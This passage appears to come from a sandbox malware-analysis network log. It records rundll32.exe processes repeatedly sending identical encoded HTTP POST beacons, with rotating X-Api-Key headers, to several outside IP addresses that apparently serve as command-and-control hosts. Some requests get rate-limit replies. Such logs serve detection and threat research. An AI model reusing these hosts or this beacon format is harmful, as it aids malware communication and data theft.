M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49732	77.238.224.56	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:36.043051958 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: HgbkLws5 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49733	77.238.224.56	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:37.048932076 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: I1t5Miuh Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49734	77.238.229.63	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:37.628230095 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: pFsqKT3N Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49735	77.238.229.63	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:38.674495935 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: f6xiHrqv Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49736	77.238.250.123	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:39.253839016 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: xA06voUp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:51:39.871294022 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:51:39 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49737	77.238.250.123	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:40.328762054 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: CCU8DIdm Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:51:40.939387083 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:51:40 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49738	195.2.70.38	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:41.322577953 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: zqG2mfyC Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49739	91.142.74.28	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:43.060127974 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: t1wbsKRa Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49740	77.238.224.56	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:44.796145916 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Q1bZOJDX Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49742	77.238.229.63	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:46.391705036 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: gCfIfSYp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49743	77.238.250.123	80	6516	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:51:48.004276037 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Z3b9rrsi Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:51:48.605667114 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:51:48 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49745	195.2.70.38	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:09.880846977 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: cZHwUfDW Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49746	195.2.70.38	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:10.950556993 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: WQ9M0udj Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49747	91.142.74.28	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:11.644249916 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: NUd7pLSC Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49748	91.142.74.28	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:12.686239958 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: THInzKVH Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49749	77.238.224.56	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:13.507388115 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Jags1Yc1 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49750	77.238.224.56	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:14.439194918 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Zw0ftNvV Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49751	77.238.229.63	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:15.152638912 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: JVy63XJH Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49752	77.238.229.63	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:16.102632046 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: QxLH2Zxp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49753	77.238.250.123	80	6580	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 12:52:16.807604074 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: gKjXy6Nw Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 15, 2024 12:52:17.423316956 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 15 Jul 2024 10:52:17 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49754	77.238.250.123	80	1216	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
